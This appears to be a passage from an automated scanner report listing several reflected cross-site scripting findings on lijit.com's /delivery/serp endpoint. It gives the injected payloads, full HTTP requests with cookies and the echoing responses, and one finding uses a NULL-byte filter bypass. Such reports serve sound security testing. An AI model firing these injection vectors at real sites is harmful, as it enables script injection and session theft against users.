Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:43:10 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( sea-ag1-n4), ms sea-ag1-n4 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:43:10 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15937

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk9aac6'><script>alert(1)</script>a426f58dd95&cb=453849055&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dother%26ad_hint%3D%26dne%3Dblog_lijit_narrow_a
...[SNIP]...

1.19. http://www.lijit.com/delivery/serp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4262"%3balert(1)//8aa39fa8111 was submitted in the q parameter. This input was echoed as c4262";alert(1)//8aa39fa8111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjkc4262"%3balert(1)//8aa39fa8111&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:43:10 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:43:10 GMT
Age: 3
Content-Length: 15818
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
var hints = ad_hint.split(/\,/);
var date = new Date();
var hint = hints[date.getSeconds() % hints.length];
return encodeURI(hint);
}

return "xss xss cd fgytr ghjkc4262";alert(1)//8aa39fa8111";
}

LijitAdsPublisher = {
   lijit_blocked_domains:new Array(),
   load:function() {
       var lijit_blocked_domains = "";
       if (lijit_blocked_domains.length >
...[SNIP]...

1.20. http://www.lijit.com/delivery/serp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19946'><script>alert(1)</script>91e3d7e06d4 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv19946'><script>alert(1)</script>91e3d7e06d4&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:21 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( h0-s1007.p1-sea), ms h0-s1007.p1-sea ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:21 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15646

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv19946'><script>alert(1)</script>91e3d7e06d4&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1566189888&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv19946%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3
...[SNIP]...

1.21. http://www.lijit.com/delivery/serp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d863'%3balert(1)//0f716ebacb was submitted in the u parameter. This input was echoed as 9d863';alert(1)//0f716ebacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv9d863'%3balert(1)//0f716ebacb&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:30 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:31 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15469

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv9d863';alert(1)//0f716ebacb&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=&cb=661173860&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv9d863%27%253balert%281%29%2F%2F0f716ebacb%26zt%3D51423%26ztb%3D51735%26
...[SNIP]...

1.22. http://www.lijit.com/delivery/serp [zt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the zt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 28e8e%3balert(1)//9cdfd4da7d2 was submitted in the zt parameter. This input was echoed as 28e8e;alert(1)//9cdfd4da7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=5142328e8e%3balert(1)//9cdfd4da7d2&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:37 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:37 GMT
Age: 0
Content-Length: 15402
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<!--
var canFireSLNoAdsScript = true;
var canFireSkyNoAdsScript = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 5142328e8e;alert(1)//9cdfd4da7d2;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 ;


var zone5142328e8e;alert(1)//9cdfd4da7d2Delivered = false;


var zone51735Delivered = false;

var numSponsoredGoogleAd
...[SNIP]...

1.23. http://www.lijit.com/delivery/serp [zt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the zt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00c11bd'%3balert(1)//55f350b8cb3 was submitted in the zt parameter. This input was echoed as c11bd';alert(1)//55f350b8cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /delivery/serp?u=buddytv&zt=51423%00c11bd'%3balert(1)//55f350b8cb3&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:35 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( h0-s1007.p1-sea), ms h0-s1007.p1-sea ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:36 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15438

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
yscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423c11bd';alert(1)//55f350b8cb3;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 ;


var zone51423c11bd';alert(1)//55f350b8cb3Delivered = false;


var zone51735Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new zones
var numSponsored
...[SNIP]...

1.24. http://www.lijit.com/delivery/serp [zt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the zt request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1670'><script>alert(1)</script>8c21c691314 was submitted in the zt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423b1670'><script>alert(1)</script>8c21c691314&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:32 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:32 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15537

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423b1670'><script>alert(1)</script>8c21c691314&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1410440807&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423b1670%27%3E%3Cscrip
...[SNIP]...

1.25. http://www.lijit.com/delivery/serp [ztb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the ztb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d599'%3balert(1)//6b07e0eccd4 was submitted in the ztb parameter. This input was echoed as 2d599';alert(1)//6b07e0eccd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=517352d599'%3balert(1)//6b07e0eccd4&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:40 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:41 GMT
Age: 3
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15416

<html>
<body>
